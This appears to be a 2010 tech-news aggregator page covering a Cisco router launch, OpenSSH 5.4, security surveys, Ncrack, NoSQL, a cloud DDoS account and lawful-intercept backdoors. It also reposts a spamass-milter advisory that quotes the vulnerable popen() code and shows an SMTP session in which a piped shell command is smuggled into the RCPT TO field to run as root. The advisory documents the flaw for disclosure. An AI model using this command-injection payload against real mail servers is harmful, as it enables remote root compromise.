uncompiled.com

Cisco (NASDAQ: CSCO) today announced a major advancement in Internet networking — the Cisco® CRS-3 Carrier Routing System (CRS) — designed to serve as the foundation of the next-generation Internet and set the pace for the astonishing growth of video transmission, mobile devices and new online services through this decade and beyond.

With more than 12 times the traffic capacity of the nearest competing system, the Cisco CRS-3 is designed to transform the broadband communication and entertainment industry by accelerating the delivery of compelling new experiences for consumers, new revenue opportunities for service providers, and new ways to collaborate in the workplace.

Overview:

* The Cisco CRS-3 triples the capacity of its predecessor, the Cisco CRS-1 Carrier Routing System, with up to 322 Terabits per second, which enables the entire printed collection of the Library of Congress to be downloaded in just over one second; every man, woman and child in China to make a video call, simultaneously; and every motion picture ever created to be streamed in less than four minutes.

* The Cisco CRS-3 enables unified service delivery of Internet and cloud services with service intelligence spanning service provider Internet Protocol Next-Generation Networks (IP NGNs) and data center. The Cisco CRS-3 also provides unprecedented savings with investment protection for the nearly 5,000 Cisco CRS-1 deployed worldwide. Cisco’s cumulative investment in the Cisco CRS family is $1.6 billion, further underscoring the company’s commitment.

* AT&T, one of the world’s largest telecommunications companies, recently tested the Cisco CRS-3 in a successful completion of the world’s first field trial of 100-Gigabit backbone network technology, which took place in AT&T’s live network between New Orleans and Miami. The trial advances AT&T’s development of the next generation of backbone network technology that will support the network requirements for the growing number of advanced services offered by AT&T to consumer and business customers, both fixed and mobile.

* The Cisco CRS-3 is currently in field trials, and its pricing starts at $90,000 U.S.

Highlights and Capabilities for the Next-Generation Internet:

* Unmatched Scale: With a proven multi-chassis architecture, the Cisco CRS-3 can deliver up to 322 tbps of capacity, more than tripling the 92 tbps capacity of the Cisco CRS-1 and representing more than 12 times the capacity of any other core router in the industry.
* Unique Core and Data Center/Cloud Services Intelligence: In addition to capacity requirements, the growths of mobile and video applications are creating new multidirectional traffic patterns with the increasing emergence of the data center cloud. The new Cisco Data Center Services System provides tight linkages between the Cisco CRS-3, Cisco Nexus family and Cisco Unified Computing System (UCS) to enable unified service delivery of cloud services. This intelligence also includes carrier-grade IPv6 (CGv6) and core IP/MPLS technologies that permit new IP NGN architectural efficiencies required to keep pace with the rapidly growing cloud services market. Unique capabilities include:
o Network Positioning System (NPS) — provides Layers 3 to 7 application information for best path to content, improving consumer and business experiences while reducing costs.
o Cloud virtual private network (VPN) for Infrastructure as a Service (IaaS)-enables ‘pay-as-you-go’ for compute, storage and network resources by automating Cisco CRS-3 and Cisco Nexus Inter-Data center connections for Cisco UCS.
* Unprecedented Savings: The Cisco CRS-3 offers dramatic operational expense savings and up to 60 percent savings on power consumption compared to competitive platforms. The Cisco CRS-3 also delivers significant capital expenditures savings and investment protection for existing Cisco CRS-1 customers. The new capabilities in the platform can be achieved by reusing the existing chassis, route processors, fans and power systems with the addition of new line cards and fabric. These upgrades can be performed in-service and be provided by Cisco Services to ensure a smooth transition.
* Silicon Innovation: The Cisco CRS-3 is powered by the new Cisco QuantumFlow Array Processor, which unifies the combined power of six chips to work as one, enabling unprecedented levels of service capabilities and processing power. Making this implementation even more unique is its ability to deliver capabilities with a fraction of the power required by lesser performing chipsets. The Cisco QuantumFlow Array chipset was designed to provide the new system the ability to scale with the ever increasing demands being placed on the IP NGN by the many different applications and billions of devices being used by both businesses and consumers in the Zettabyte era.

Source

The development team behind secure shell server OpenSSH have released version 5.4, which includes a range of new functions and fixes a number of bugs in the previous version.

Following a transition period of more than 10 years, OpenSSH 5.4 finally disables, by default, the old SSH protocol version 1. The legacy SSH version, which is no longer considered secure, can still be used by adjusting the appropriate settings in the configuration file. Where certificates are used to authenticate users and computers, version 5.4 offers a new minimal OpenSSH format. Key pairs for users can be revoked using the new RevokedKeys option. Host keys can be revoked in the known_hosts file.

Using the -W switch and a host:port argument, OpenSSH 5.4 can be started in netcat mode, which connects a local computer’s standard input channel (stdio) to a port on a remote PC. The SFTP server, which carries out FTP-like file transfer, now protects file sharing settings from being overwritten (read-only mode) and can, if required, set explicit privileges when generating new files (umask) at the command line. The SFTP client now has tab completion for commands and paths and supports recursive get and put commands which allows entire file trees to be transferred between client and server.

Source

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the shadows not HERE) aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definetly
seeking the nice 0days!

Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++

Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

Postfix
What is Postfix? It is Wietse Venema’s mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).

From spamass-milter-0.3.1 (-latest) Line 820:

//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//

sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
struct context *sctx = (struct context*)smfi_getpriv(ctx);
SpamAssassin* assassin = sctx->assassin;
FILE *p;
#if defined(__FreeBSD__)
int rv;
#endif

debug(D_FUNC, “mlfi_envrcpt: enter”);

if (flag_expand)
{
/* open a pipe to sendmail so we can do address
expansion */

char buf[1024];
char *fmt=”%s -bv \”%s\” 2>&1″;

#if defined(HAVE_SNPRINTF)
snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
/* XXX possible buffer overflow here // is this a
joke ?! */
sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif

debug(D_RCPT, “calling %s”, buf);

#if defined(__FreeBSD__) /* popen bug – see PR bin/50770 */
rv = pthread_mutex_lock(&popen_mutex);
if (rv)
{
debug(D_ALWAYS, “Could not lock popen mutex: %
s”, strerror(rv));
abort();
}
#endif

p = popen(buf, “r”); [1]
if (!p)
{
debug(D_RCPT, “popen failed(%s). Will not
expand aliases”, strerror(errno));
assassin->expandedrcpt.push_back(envrcpt[0]);

[1] the vulnerable popen() call.

Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:”|touch /tmp/foo”
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r–r– 1 root root 0 2010-03-07 19:46 /tmp/foo

Signed,

Kingcope

Source

Brocade’s “man-on-the-street” survey at this week’s RSA conference in San Francisco, revealed that 47 percent of respondents believe their network security solutions are less than 25 percent effective in thwarting security threats. Given the frequency of new attacks on networks every day, it’s clear IT security professionals aren’t feeling prepared.

Of those polled, nearly 20 percent of those surveyed believe their company’s security policies that deal with threats or data leaks are not being enforced effectively, while 80 percent believe the policies are only being “somewhat enforced.” Therefore, regardless of how ironclad a company’s security policies are, enforcing them 100 percent of the time is impossible and can expose a company to outside threats unnecessarily.

When asked about sources of security threats and breaches, 48 percent of those polled identified individuals within their organization providing or selling sensitive information to competitive companies as their most serious security concern; this was followed by concerns about threats posed by foreign governments (15%) and hacking attacks by cyber criminals (10%). Despite the constant threat of foreign entities and governments infiltrating U.S. companies that have made headlines, most security executives’ fears are overwhelmingly focused on internal competitive threats vs. a malicious foreign attack.

Another interesting finding revealed that nearly 40 percent of those surveyed felt background checks on employees were ineffective in determining if that person could be a potential spy for a competitor or foreign government.

The survey polled 144 conference attendees that are involved in the IT security decision making process within a wide variety of industries including networking manufacturing, education, software, healthcare, telecommunications, government and finance.

Source

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients.

Ncrack was designed using a modular approach, a command-line syntax similar to Nmap and a dynamic engine that can adapt its behaviour based on network feedback. It allows for rapid, yet reliable large-scale auditing of multiple hosts.

Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more.

Ncrack was started as a “Google Summer of Code” Project in 2009. While it is already useful for some purposes, it is still unfinished, alpha quality software. It is released as a standalone tool, be sure to read the Ncrack man page to fully understand Ncrack usage.

Source

For almost a year now, the idea of “NoSQL” has been spreading due to the demand for relational database alternatives. Maybe the biggest motivation behind NoSQL is scalability. Relational databases don’t lend themselves well to the kind of horizontal scalability that’s required for large-scale social networking or cloud applications, and ORMs can abstract away impedance mismatch only so much. In other cases, companies just don’t need as many of the complex features and rigid schemas provided by relational databases. Most people are not suggesting that we all ditch the RDBMS, in fact, many companies don’t really need to switch. Relational databases will probably be necessary for many applications years and years from now. In essence, NoSQL is a movement that aims to reexamine the way we structure data and draw attention to innovation in hopes of finding the solution to the next generation’s data persistence problems.

Check the source for details on various types of NoSQL.

Source

Over the weekend, my cloud computing infrastructure survived a major hacking attack. Here is what happened and what it took to recover it.

This weekend my servers out in the cloud space fended off a major hacking attack across two of the systems that I have given the public access to use them. The attack started simply on Friday night as a simple series of scans to see if there was anything in the IP space that I am using. This is the fairly standard attack pattern that many information security people see every day. Thinking that this was normal I closed up shop on Friday and went home.

On Sunday I got an alert from the system that it had hung and when I went to go try to take a look at it using HTTP and SFTP the computer simply would not respond, there was no way to access it. In the control panel provided by the company I use for cloud hosting, I simply rebooted the box thinking that it was hung on a process that was keeping the box from being accessed. Over Sunday night, I got three more alerts that that the box had hung.

Monday morning when I went into work I rebooted the box again (this is a low priority box with almost no regular use over the weekend) and dove into the error logs for the box.

Over the Saturday Sunday time period someone had seriously tried to get into the computer. Over 250 gigs of access logs and over 300 gigs of error logs had almost consumed the disk space that I was using. The computer was not simply hung on a process, it had been resource starved because during the hacking attack the hacker had hit the system so hard that there were no more ports open to make a legitimate connection. They had towards the end of the attack (Sunday night) hit the computers with what looks like a simple denial of service attack at towards the end of the attack.

My thoughts on this is that, my computer survived and came back to operations with a simple reboot of the cloud computer to free up resources that had been consumed during the attack. No data was lost or stolen from the system and its role is to deliver Multi-media and provide data back to a Learning Management System. This meant the loss of some ability for the LMS but nothing that would have killed the entire system.

The 300 Gigs of error logs is over kill, the assumption was that at some point the hacker or hackers got angry enough that they could not get into the system that they simply did a Denial of Service against the box aiming to resource starve the system and cause problems for the System Administrator over the weekend. I do not think they knew it was on the cloud or that it was a simple matter of rebooting the box to restore services.

The hacker or hackers had failed in getting into the box, which is good, but resorted to DDOS to cause resource starvation as a final act. I do not think we are dealing with a true professional, but I do think we are dealing with a person who is a step above a script kiddy. They had access to an awesome level of firepower for their DDOS, we logged thousands of IP’s Sunday night. My belief on this one is that the person or persons had access to a botnet or a very large number of compromised systems to make this work.

I paid 20 cents a gig in bandwidth costs for the attack, with the 500 gigs of traffic roughly aimed at the system according to my monitor I paid 100 dollars to my cloud service provider for bandwidth consumed during the attack.

I only had temporary loss of one system because of the way that we distributed the cloud architecture across multiple systems in different data centers. As users switched over to different data centers, the system performed as architected, people were able to get their data over the weekend and nothing was truly slowed down or otherwise inaccessible during the attack.

It took two hours to go through the log files on the system to see what had happened. It took 15 minutes to generate the report to IT. This is literally the quickest I have ever gone through an attack, with clean up and with log analysis ever. It is also the cheapest attack I have ever dealt with in terms of loss or dollar costs associated with an attack ever. Which made for a fun hacking attack with a ton of data to use in the classroom and share. The good part is that a distributed architecture in this case worked which validates the way we built the cloud based system with fail over in mind, not necessarily a hacking attack induced failure of a system.

It is possible to attack a cloud computing system, and it is possible to resource starve a cloud computer, but in the longer run survivability and the ability to get to data relies on the architecture that the system was initially built around. If you are building a cloud space for your company, think in terms of survivability and fail over if a system in your cloud space fails for any reason and how to recover and still present data to the end user. Hacking attacks happen, and hackers will get angry and try to DDOS your site off the planet, how you architect your cloud space and cloud services will help you survive hackers as well as the occasional other failures in the system.

Source

A storage startup called Nasuni is unveiling a virtual NAS file server that runs on VMware and connects customers to cloud platforms such as Amazon’s Simple Storage Service, adding encryption to enhance security and several features to improve performance.

Nasuni was founded last year and on Tuesday is announcing the beta version of its Nasuni Filer – a so-called “cloud storage gateway.” Target customers are mid-sized companies who are interested in cloud storage, but are concerned about exposing sensitive data or suffering from high latency.

“We connect our customers to partners, people like Iron Mountain and Amazon that provide cloud storage, and we are delivering it as a file server in your virtual environment,” says Nasuni founder and CEO Andres Rodriguez, who previously founded Archivas, an online storage management software vendor acquired by Hitachi Data Systems three years ago.

Nasuni is based in Natick, Mass., with 18 employees, and has $8 million in first-round funding from North Bridge Venture Partners and Sigma Partners. Rodriguez says Nasuni has eight customers in alpha mode and is now offering the filer in a free public beta.

Nasuni’s NAS file server runs in a VMware virtual machine and integrates with either Amazon S3 or Iron Mountain remote storage services, while providing features such as encryption, caching, deduplication, automatic provisioning, and synchronous snapshots.

Accessing cloud storage introduces latency, Rodriguez says, but Nasuni allows users to work with a local cache, speeding up access to data.

“It’s quite clever,” says IDC analyst Laura DuBois. “It does address security concerns in the form of encryption of data in flight and at rest, and it also certainly addresses the concerns around availability.”

Nasuni is one of many startups building software and services that add capability to cloud platforms such as Amazon. For example, the company RightScale was founded to help customers build and clone virtual servers and manage storage in the cloud, and Symantec offers storage management for Amazon customers.

Nasuni will make its product generally available in the spring, and add more partners before doing so, according to Rodriguez. Nasuni will start charging customers after the beta trial, with fees starting around $250 a month. Although two vendors will be involved in each sale, customers would receive just one bill, which could come either from Nasuni or a partner depending on the billing model, he says.

Source

The “backdoors” that Cisco and other networking companies implement in their routers and switches for lawful intercept are front and center again at this week’s Black Hat security conference. A few years ago, they were cause celebre in some VoIP wiretapping arguments and court rulings.

This time, an IBM researcher told Black Hat conference attendees that these openings can still expose information about us to hackers and allow them to “watch” our Internet activity. Backdoors are implemented in routers and switches so law enforcement officials can track the Internet communications and activity of an individual or individuals under surveillance. They are required by law to be incorporated in devices manufactured by networking companies and sold to ISPs.

In this report from Forbes, IBM Internet Security Systems researcher Tom Cross demonstrated how easily the backdoor in Cisco IOS can be exploited by hackers. When they gain access to a Cisco router, they are not blocked after multiple failed access attempts nor is an alert sent to an administrator. Any data collected through the backdoor can be sent to anywhere — not just merely to an authorized user, Forbes reports.

What’s more, an ISP is not able to perform an audit trail on whoever tried to gain access to a router through the backdoor – that nuance was intended to keep ISP employees from detecting the intercept and inadvertently tipping off the individual under surveillance. But according to IBM’s Cross, any authorized employee can use it for unauthorized surveillance of users and those privacy violations cannot be tracked by the ISP.

Cisco said it is aware of Cross’s assertions and is taking them under consideration. To Cisco’s credit, it is the only networking company that makes its lawful intercept architecture public, according to the recommendations of the IETF, the Forbes story states. Other companies do not, which means they may be susceptible to the same security flaws, or worse.

Source

German encryption firm SecurStar has strenuously denied being behind an apparently independent test of voice encryption products that found many of its rivals could be hacked using a $100 phone-tapping program.

In a blog on the subject, Fabio Pietrosanti, founder and CTO of Swiss encryption startup Khamsa, alleges that a supposedly independent test of 15 encryption products was in fact a marketing exercise designed to publicise one of only three products to pass the hacking test, SecurStar’s PhoneCrypt.

The tests by an anonymous researcher, ‘Notrax’, found that all but three programs and hardware products looked at could be bypassed by installing a simple wiretapping Trojan called FlexiSPY to record voice output without the programs giving the user any indication that security had been compromised.

Khamsa’s own GSM security software was not part of the test but the encryption technology it uses, ZRTP, came in for criticism. The moving force behind that system and its implementation in a program called Zfone is encryption pioneer and inventor of Pretty Good Privacy, Phil Zimmermann, who is also listed as being on Khamsa’s scientific board.

According to Pietrosanti, the unnamed ‘Notrax’ was subsequently traced to an IP address connected to SecurStar after the individual followed a link embedded in a blog Pietrosanti had posted.

“The SecurStar GmbH PBX is open on the internet, it contains all the names of their employee and confirm us that the author of http:/infosecurityguard.com [the domain used to post the original test] is that company and is the anonymous hacker called Notrax,” says Pietrosanti.

He adds that SecuStar also appeared to be logging Google keywords related to the topic so as to have some idea of how the tests were being discussed.

When contacted, SecurStar denied any involvement with the tests. “We do not have anything to do with these tests and I have no idea about him [Notrax],” said SecurStar CEO, Wilfried Hafner in a call to Techworld.

According to Hafner, that Notrax used a SecurStar IP address was because the individual concerned had probably used the company’s anonymity service that hides real IPs behind his company’s.

“We have two million people using this product. Or he may have been an old customer of ours,” said Hafner.

As far as they go, the tests do appear to find a legitimate weakness in the programs under test even if a connection to one of the companies involved would represent a huge conflict of interest and discredit them in the eyes of the security community. Pietrosanti is certainly correct to say that researchers are normally keen to be identified with their testing, something ‘Notrax’ has avoided doing so far.

Source